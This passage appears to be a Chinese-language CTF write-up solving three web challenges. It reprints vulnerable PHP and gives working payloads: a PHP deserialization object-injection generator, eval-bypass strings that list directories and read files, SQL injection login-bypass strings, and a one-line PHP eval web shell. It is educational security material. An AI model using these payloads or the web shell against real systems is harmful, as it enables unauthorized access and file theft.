\u6790\u6784\u51fd\u6570\uff1a\u5728\u5bf9\u8c61\u9500\u6bc1\u65f6\u81ea\u52a8\u8c03\u7528 fetch()\n public function __destruct() {\n \/\/ \u81ea\u52a8\u89e6\u53d1\u4e00\u6b21 fetch() \u64cd\u4f5c\n $this->fetch();\n }\n}\n?><\/code><\/pre>\n\n\n\nindex.php<\/strong><\/p>\n\n\n\n<?php\n\/\/ \u5f15\u5165\u6570\u636e\u5e93\u914d\u7f6e\uff08\u5982 $db \u8fde\u63a5\uff09\u548c\u7c7b\u5b9a\u4e49\uff08\u5982 ShitMountant\u3001FileLogger \u7b49\uff09\nrequire_once \".\/config.php\";\nrequire_once \".\/classes.php\";\n\n\/\/ \u68c0\u67e5\u5f53\u524d\u8bf7\u6c42\u662f\u5426\u4e3a POST \u65b9\u6cd5\uff08\u7528\u4e8e\u5904\u7406\u7528\u6237\u63d0\u4ea4\u7684\"\u5c0f\u84dd\u9ca8\"\u6570\u636e\uff09\nif ($_SERVER[\"REQUEST_METHOD\"] === \"POST\") {\n \/\/ \u4ece POST \u6570\u636e\u4e2d\u83b7\u53d6\u540d\u4e3a \"shark\" \u7684\u5b57\u6bb5\uff0c\u82e5\u672a\u63d0\u4f9b\u5219\u9ed8\u8ba4\u4e3a \"\u55b5\u55b5\u55b5?\"\uff08\u53cb\u597d\u9519\u8bef\u63d0\u793a\uff09\n $s = $_POST[\"shark\"] ?? '\u55b5\u55b5\u55b5?';\n\n \/\/ \u68c0\u67e5\u8f93\u5165\u662f\u5426\u4ee5 \"blueshark:\" \u524d\u7f00\u5f00\u5934\uff08\u7528\u4e8e\u6807\u8bc6\u5408\u6cd5\u683c\u5f0f\uff09\n if (str_starts_with($s, \"blueshark:\")) {\n \/\/ \u53bb\u6389\u524d\u7f00 \"blueshark:\"\uff0c\u53ea\u4fdd\u7559\u540e\u7eed\u5185\u5bb9\n $ss = substr($s, strlen(\"blueshark:\"));\n\n \/\/ \u5c1d\u8bd5\u53cd\u5e8f\u5217\u5316 $ss \u5185\u5bb9\n \/\/ @ \u6291\u5236\u9519\u8bef\u662f\u4e3a\u4e86\u907f\u514d\u66b4\u9732\u53cd\u5e8f\u5217\u5316\u5931\u8d25\u7684\u7ec6\u8282\uff0c\u4f46\u65e0\u6cd5\u963b\u6b62\u6f0f\u6d1e\u5229\u7528\n $o = @unserialize($ss);\n\n \/\/ \u5c06\u539f\u59cb\u5e8f\u5217\u5316\u5b57\u7b26\u4e32 $ss\uff08\u4e0d\u542b\u524d\u7f00\uff09\u5b58\u5165\u6570\u636e\u5e93 notes \u8868\u7684 content \u5b57\u6bb5\n \/\/ \u4f7f\u7528\u9884\u5904\u7406\u8bed\u53e5\u9632\u6b62 SQL \u6ce8\u5165\n $p = $db->prepare(\"INSERT INTO notes (content) VALUES (?)\");\n $p->execute([$ss]);\n\n \/\/ \u8fd4\u56de\u4fdd\u5b58\u6210\u529f\u7684\u63d0\u793a\u5e76\u7ec8\u6b62\u811a\u672c\n echo \"save sucess!\";\n exit(0);\n } else {\n \/\/ \u5982\u679c\u8f93\u5165\u4e0d\u7b26\u5408 \"blueshark:\" \u683c\u5f0f\uff0c\u8fd4\u56de\u9519\u8bef\u63d0\u793a\n echo \"\u55b5\u55b5\u55b5?\";\n exit(1);\n }\n}\n\n\/\/ \u67e5\u8be2\u6570\u636e\u5e93\u4e2d\u6700\u8fd1\u7684 10 \u6761\u7b14\u8bb0\uff08\u6309 id \u964d\u5e8f\u6392\u5217\uff09\n$q = $db->query(\"SELECT id, content FROM notes ORDER BY id DESC LIMIT 10\");\n\n\/\/ \u83b7\u53d6\u6240\u6709\u7ed3\u679c\u4e3a\u5173\u8054\u6570\u7ec4\n$rows = $q->fetchAll(PDO::FETCH_ASSOC);\n?>\n\n<!doctype html>\n<html>\n<head>\n <meta charset=\"utf-8\" \/>\n <title>\u5b9d\u5b9d\u4f60\u662f\u4e00\u53ea\u732b\u732b<\/title>\n <style>\n \/* \u57fa\u7840\u9875\u9762\u6837\u5f0f\uff1a\u4f7f\u7528\u7cfb\u7edf\u5b57\u4f53\uff0c\u5185\u8fb9\u8ddd *\/\n body { \n font-family: system-ui, -apple-system, \"Segoe UI\", Roboto, \"Helvetica Neue\", Arial; \n padding: 24px; \n }\n\n \/* \u6587\u672c\u57df\u6837\u5f0f\uff1a\u5168\u5bbd\u3001\u7b49\u5bbd\u5b57\u4f53\uff0c\u4fbf\u4e8e\u8f93\u5165\u5e8f\u5217\u5316\u5185\u5bb9 *\/\n textarea { \n width: 100%; \n max-width: 800px; \n height: 120px; \n font-family: monospace; \n }\n\n \/* \"Recent\" \u533a\u5757\u6837\u5f0f *\/\n .recent { \n margin-top: 20px; \n max-width: 900px; \n }\n\n \/* \u5355\u6761\u7b14\u8bb0\u6837\u5f0f\uff1a\u6d45\u7070\u8272\u80cc\u666f\u3001\u5706\u89d2\u3001\u4fdd\u7559\u6362\u884c\u548c\u7a7a\u683c *\/\n .note { \n background: #f7f7f8; \n padding: 10px; \n border-radius: 6px; \n margin-bottom: 8px; \n font-family: monospace; \n white-space: pre-wrap; \n }\n\n \/* \u5143\u4fe1\u606f\uff08\u5982 ID\uff09\u6837\u5f0f\uff1a\u7070\u8272\u3001\u7a0d\u5c0f\u5b57\u4f53 *\/\n .meta { \n color: #666; \n font-size: 90%; \n margin-bottom: 6px; \n }\n\n \/* \u6309\u94ae\u6837\u5f0f *\/\n .btn { \n padding: 8px 14px; \n border-radius: 6px; \n border: 1px solid #ccc; \n background: #fff; \n cursor: pointer; \n }\n <\/style>\n<\/head>\n<body>\n <h1>SharkHub<\/h1>\n\n <!-- \u8868\u5355\u7528\u4e8e\u63d0\u4ea4\"\u5c0f\u84dd\u9ca8\"\u6570\u636e -->\n <form method=\"POST\" style=\"max-width: 900px; margin-bottom: 18px;\">\n <p>\u4f60\u559c\u6b22\u5c0f\u84dd\u9ca8\u5417\uff1f<\/p>\n <br\/>\n <!--\n \u6ce8\u610f\uff1a\u4ee5\u4e0b\u8868\u5355\u8f93\u5165\u533a\u57df\u88ab\u6ce8\u91ca\u6389\u4e86\uff01\n \u8fd9\u610f\u5473\u7740\u524d\u7aef\u65e0\u6cd5\u76f4\u63a5\u63d0\u4ea4\u6570\u636e\uff0c\u4f46\u540e\u7aef\u4ecd\u63a5\u53d7 POST \u8bf7\u6c42\u3002\n \u653b\u51fb\u8005\u53ef\u76f4\u63a5\u7528 curl \u6216 Burp Suite \u53d1\u9001 POST \u6570\u636e\u7ed5\u8fc7\u524d\u7aef\u9650\u5236\u3002\n -->\n <!--\n <textarea id=\"s\" name=\"shark\" placeholder=\"\"><\/textarea><br\/>\n <br\/>\n <button class=\"btn\" type=\"submit\">commit<\/button>\n -->\n <\/form>\n\n <!-- \u663e\u793a\u6700\u8fd1 10 \u6761\u63d0\u4ea4\u7684\u7b14\u8bb0 -->\n <div class=\"recent\">\n <h2>Recent<\/h2>\n <?php foreach ($rows as $r): ?>\n <div class=\"note\">\n <!-- \u663e\u793a\u7b14\u8bb0 ID\uff0c\u8fdb\u884c HTML \u8f6c\u4e49\u9632\u6b62 XSS -->\n <div class=\"meta\">#<?= htmlspecialchars($r['id'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') ?><\/div>\n\n <!-- \u663e\u793a\u539f\u59cb\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\uff08\u672a\u53cd\u5e8f\u5217\u5316\uff09\uff0c\u540c\u6837\u8fdb\u884c HTML \u8f6c\u4e49 -->\n <div><?= htmlspecialchars($r['content'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') ?><\/div>\n <\/div>\n <?php endforeach; ?>\n <\/div>\n<\/body>\n<\/html><\/code><\/pre>\n\n\n\n\u6784\u9020\u53cd\u5e8f\u5217\u5316<\/p>\n\n\n\n
<?php\n\/**\n * \u751f\u6210 payload: shark=blueshark:O:12:\"ShitMountant\":2:\n * {s:3:\"url\";s:12:\"file:\/\/\/flag\";s:6:\"logger\";N;}\n * \n * \u6838\u5fc3\u8bf4\u660e\uff1a\n * 1. \u7c7b\u540d ShitMountant \u6309 payload \u8981\u6c42\uff0c\u957f\u5ea6\u4e3a 12\n * 2. url \u5c5e\u6027\u503c\u4e3a \"file:\/\/\/flag\"\uff0cpayload \u4e2d\u957f\u5ea6\u6807\u8bc6\u4e3a 12\n * 3. logger \u5c5e\u6027\u8bbe\u4e3a null\uff08\u5e8f\u5217\u5316\u540e\u4e3a N\uff09\n *\/\n\nclass ShitMountant {\n \/\/ \u4e0epayload\u5bf9\u5e94\u7684\u516c\u5f00\u5c5e\u6027\n public $url;\n public $logger;\n\n \/\/ \u6784\u9020\u51fd\u6570\uff1a\u521d\u59cb\u5316\u5c5e\u6027\u503c\uff08\u5339\u914dpayload\u4e2d\u7684\u53c2\u6570\uff09\n public function __construct() {\n $this->url = \"file:\/\/\/flag\"; \/\/ payload\u4e2durl\u7684\u503c\uff0c\u5bf9\u5e94 s:12\n $this->logger = null; \/\/ payload\u4e2dlogger\u7684\u503c\uff0c\u5bf9\u5e94 N\n }\n}\n\n\/\/ 1. \u5b9e\u4f8b\u5316\u5bf9\u8c61\uff08\u5c5e\u6027\u81ea\u52a8\u6309\u6784\u9020\u51fd\u6570\u521d\u59cb\u5316\uff09\n$malicious_obj = new ShitMountant();\n\n\/\/ 2. \u5e8f\u5217\u5316\u5bf9\u8c61\uff08\u751f\u6210 payload \u6838\u5fc3\u90e8\u5206\uff09\n$serialized_str = serialize($malicious_obj);\n\n\/\/ 3. \u62fc\u63a5 blueshark: \u524d\u7f00\uff0c\u751f\u6210\u6700\u7ec8\u63d0\u4ea4\u7684 shark \u53c2\u6570\u503c\n$final_payload = \"shark=blueshark:\" . $serialized_str;\n\n\/\/ 4. \u8f93\u51fa\u7ed3\u679c\uff08\u76f4\u63a5\u590d\u5236\u63d0\u4ea4\u5373\u53ef\uff09\necho \"\u751f\u6210\u7684\u6b63\u786epayload\uff1an\";\necho $final_payload . \"nn\";\necho \"\u5e8f\u5217\u5316\u6838\u5fc3\u4e32\uff08blueshark: \u540e\u9762\u7684\u90e8\u5206\uff09\uff1an\";\necho $serialized_str;\n?><\/code><\/pre>\n\n\n\n\u53cd\u5e8f\u5217\u5316\uff1a<\/p>\n\n\n\n
shark=blueshark:O:12:\"ShitMountant\":2:\n{s:3:\"url\";s:12:\"file:\/\/\/flag\";s:6:\"logger\";N;}<\/code><\/pre>\n\n\n\n\u8fdb\u884cpost\u4f20\u53c2\u63d0\u4ea4<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u56de\u663esave sucess<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u8bbf\u95ee<\/p>\n\n\n\n
http://challenge.bluesharkinfo.com:28794\/api.php?id=1<\/code><\/pre>\n\n\n\n\u5f97\u5230flag<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nezrce<\/h3>\n\n\n\n<\/div><\/figure>\n\n\n\n\u4ee3\u7801\u5ba1\u8ba1<\/p>\n\n\n\n
<?php\n\/\/ \u9ad8\u4eae\u5e76\u8f93\u51fa\u5f53\u524d\u6587\u4ef6\u7684\u6e90\u4ee3\u7801\uff08\u7528\u4e8e\u5c55\u793a\u4ee3\u7801\u7ed3\u6784\uff09\nhighlight_file(__FILE__);\n\n\/\/ \u68c0\u67e5\u662f\u5426\u901a\u8fc7GET\u8bf7\u6c42\u4f20\u9012\u4e86'code'\u53c2\u6570\nif (isset($_GET['code'])) {\n \/\/ \u5c06GET\u53c2\u6570'code'\u7684\u503c\u8d4b\u7ed9\u53d8\u91cf$code\n $code = $_GET['code'];\n\n \/* \u6b63\u5219\u8868\u8fbe\u5f0f\u6821\u9a8c\uff1a\n \/^ - \u5339\u914d\u5b57\u7b26\u4e32\u5f00\u59cb\n [A-Za-z()_;]+ - \u5141\u8bb8\u5b57\u6bcd\uff08\u5927\u5c0f\u5199\uff09\u3001\u62ec\u53f7\u3001\u4e0b\u5212\u7ebf\u3001\u5206\u53f7\n $\/ - \u5339\u914d\u5b57\u7b26\u4e32\u7ed3\u675f\n \u8be5\u6b63\u5219\u610f\u56fe\u9650\u5236\u53ef\u6267\u884c\u4ee3\u7801\u7684\u5b57\u7b26\u8303\u56f4\uff0c\u4f46\u5b58\u5728\u4e25\u91cd\u6f0f\u6d1e\uff01\n *\/\n if (preg_match('\/^[A-Za-z()_;]+$\/', $code)) {\n \/\/ \u5371\u9669\u64cd\u4f5c\uff1a\u6267\u884c\u6765\u81ea\u7528\u6237\u8f93\u5165\u7684\u4efb\u610f\u4ee3\u7801\uff08\u5b58\u5728\u4e25\u91cd\u5b89\u5168\u98ce\u9669\uff09\n eval($code);\n } else {\n \/\/ \u6821\u9a8c\u5931\u8d25\u65f6\u7ec8\u6b62\u7a0b\u5e8f\u5e76\u8f93\u51fa\u63d0\u793a\n die('\u5e08\u5085\uff0c\u4f60\u60f3\u62ffflag\uff1f');\n }\n}\n?><\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\n\u8fd9\u4e9b\u90fd\u4e0d\u884c<\/p>\n\n\n\n
\u6784\u9020payload<\/strong><\/p>\n\n\n\n?code=print_r(scandir(dirname(dirname(dirname(dirname(getcwd()))))));<\/code><\/pre>\n\n\n\npayload\u89e3\u6790
getcwd()
\u529f\u80fd\uff1a\u83b7\u53d6\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55<\/p>\n\n\n\n
\u793a\u4f8b\uff1a\u5982\u679cWeb\u670d\u52a1\u6839\u76ee\u5f55\u662f\/var\/www\/html\/ctf,\u800c\u5f53\u524d\u811a\u672c\u5728\/var\/www\/html\/ctf\/challenge\/\u4e2d\u90a3\n\u4e48getcwd()\u8fd4\u56de\/var\/www\/html\/ctf\/challenge<\/code><\/pre>\n\n\n\ndirname($path)
\u529f\u80fd\uff1a\u8fd4\u56de\u8def\u5f84\u7684\u7236\u76ee\u5f55
\u9010\u5c42\u5411\u4e0a<\/p>\n\n\n\n
dirname(getcwd()) \u2192 \/var\/www\/html\/ctf\ndirname(dirname(getcwd())) \u2192 \/var\/www\/html\ndirname(dirname(dirname(getcwd()))) \u2192 \/var\/www\ndirname(dirname(dirname(dirname(getcwd())))) \u2192 \/var<\/code><\/pre>\n\n\n\nscandir($path)
\u529f\u80fd:\u5217\u51fa\u6307\u5b9a\u76ee\u5f55\u4e2d\u7684\u6240\u6709\u6587\u4ef6\u548c\u5b50\u76ee\u5f55\uff08\u5305\u62ec.\u548c..\uff09
\u8fd4\u56de\u503c\uff1a\u4e00\u4e2a\u6570\u7ec4\uff0c\u4f8b\u5982\uff1a<\/p>\n\n\n\n
['.', '..', 'www', 'log', 'lib', 'flag.txt']<\/code><\/pre>\n\n\n\nprint_f(….)
\u529f\u80fd\uff1a\u5c06\u53d8\u91cf\uff08\u8fd9\u91cc\u662fscandir\u8fd4\u56de\u7684\u6570\u7ec4\uff09\u4ee5\u53ef\u8bfb\u683c\u5f0f\u6253\u5370\u51fa\u6765\uff0c\u4fbf\u4e8e\u67e5\u770b\u76ee\u5f55\u5185\u5bb9
\u603b\u7ed3<\/p>\n\n\n\n
\u4ece\u5f53\u524d Web \u811a\u672c\u6240\u5728\u76ee\u5f55\u5411\u4e0a\u8df3 4 \u5c42\uff0c\u7136\u540e\u5217\u51fa\u8be5\u76ee\u5f55\u4e0b\u7684\u6240\u6709\u6587\u4ef6\u548c\u5b50\u76ee\u5f55\uff0c\u76ee\u7684\u662f\u5bfb\u627e\u5982\nflag.txt\u3001\/flag \u7b49\u654f\u611f\u6587\u4ef6<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n\u5347\u7ea7payload<\/p>\n\n\n\n
?code=chdir(dirname(dirname(dirname(getcwd()))));highlight_file(flag);\n\/\/\u6216\u8005\n?code=chdir(dirname(dirname(dirname(getcwd()))));readfile(flag);<\/code><\/pre>\n\n\n\npayload\u89e3\u6790<\/p>\n\n\n\n
chdir \u662f PHP \u4e2d\u7684\u51fd\u6570\uff0c\u7528\u4e8e\u66f4\u6539\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55\u3002\ndirname \u662f PHP \u5185\u7f6e\u51fd\u6570\uff0c\u7528\u4e8e\u8fd4\u56de\u8def\u5f84\u4e2d\u7684\u4e0a\u4e00\u7ea7\u76ee\u5f55\u3002\ngetcwd() \u8fd4\u56de\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55\u7684\u8def\u5f84\u3002\nhighlight_file \u7528\u4e8e\u9ad8\u4eae\u663e\u793a\u6587\u4ef6\u5185\u5bb9\uff08\u901a\u5e38\u662f PHP \u6587\u4ef6\uff09\uff0c\u5e76\u5c06\u5176\u8f93\u51fa\u5230\u6d4f\u89c8\u5668\u3002<\/code><\/pre>\n\n\n\n\n- \u5c06\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55\u5207\u6362\u5230\u6bd4\u5f53\u524d\u76ee\u5f55\u4f4e\u4e09\u7ea7\u7684\u76ee\u5f55\u3002<\/li>\n\n\n\n
- \u5c1d\u8bd5\u9ad8\u4eae\u663e\u793a\u6307\u5b9a\u6587\u4ef6\u7684\u5185\u5bb9\uff08\u901a\u5e38\u662f flag \u6587\u4ef6\uff09<\/li>\n<\/ol>\n\n\n\n
\u5f97\u5230flag<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nflag\u5230\u5e95\u5728\u54ea<\/h3>\n\n\n\n<\/div><\/figure>\n\n\n\n\u5c0f\u84dd\u9ca8\u90e8\u7f72\u4e86\u4e00\u4e2a\u7f51\u9875\u9879\u76ee\uff0c\u4f46\u662f\u600e\u4e48403\u554a\uff0c\u597d\u50cf\u4ec0\u4e48\u722c\u866b\u4ec0\u4e48\u7684<\/code><\/pre>\n\n\n\n\u5ba1\u9898
\u6839\u636e\u9898\u76ee\u548c\u63d0\u793a\u77e5\u9053\u7528\u6237\u662fadmin<\/p>\n\n\n\n
\u5e76\u4e14\u5c0f\u84dd\u9ca8\u8bf4\u8d26\u6237\u5fc5\u987b\u662fadmin\u54e6\uff0c\u4e0d\u8981\u5728\u7528\u6237\u540d\u4e0a\u505a\u5c1d\u8bd5\u5566! \u5982\u679c\u8981\u4f7f\u7528\u903b\u8f91\u8fd0\u7b97\u7b26\u8bf7\u4f7f\u7528\u5927\u5199<\/code><\/pre>\n\n\n\n\u601d\u8def1\uff1a\u5bc6\u7801\u7206\u7834 ==> \u540e\u7eed\u8fdb\u884c\u6d4b\u8bd5\u5931\u8d25
\u601d\u8def2\uff1a\u4e07\u80fd\u5bc6\u7801 ==> ” OR ‘1’=’1′ — ‘
\u6839\u636erobots.txt\u534f\u8bae\u5f97\u5230\u5176\u5b9e\u76ee\u5f55\u626b\u63cf\u4e5f\u884c<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u8ddf\u8fdb<\/p>\n\n\n\n
\/admin\/login.php<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n\u540c\u6837\u4e5f\u63d0\u793a\u4e86username=admin<\/p>\n\n\n\n
\u4e07\u80fd\u5bc6\u7801\u8fdb\u5165<\/p>\n\n\n\n
' OR '1'='1' --\n'' OR '1'='1' -- '<\/code><\/pre>\n\n\n\n\u8ddf\u7740\u63d0\u793a\u8d70\u5c31\u884c\u4e86\u4e0a\u4f20webshell\u8681\u5251\u8fde\u63a5\u62ff\u5230flag<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n1.php<\/p>\n\n\n\n
<?php @eval($_REQUEST[8]);?><\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n\u8fde\u63a5\u5c31\u884c<\/p>\n\n\n\n
![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-1-1024x314.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-2.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-3.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-4-1024x485.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-5.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-6.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-7.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-8.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-9.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-10.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-11-1024x330.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-12-1024x469.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-13-1024x512.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-14-1024x521.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-15-1024x191.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-16-1024x208.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-17-1024x592.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-18-1024x576.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-19.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-20-1024x605.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-21.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-22-1024x383.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-23-1024x182.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-24.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-25-1024x406.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-26-1024x551.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-27-1024x456.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-28.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-29-1024x572.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-30-1024x377.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-31-1024x213.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-32-1024x376.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-33.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-34-1024x478.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-35-1024x468.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-36-1024x413.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image-37-1024x326.png\")
<\/div><\/figure>\n\n\n\n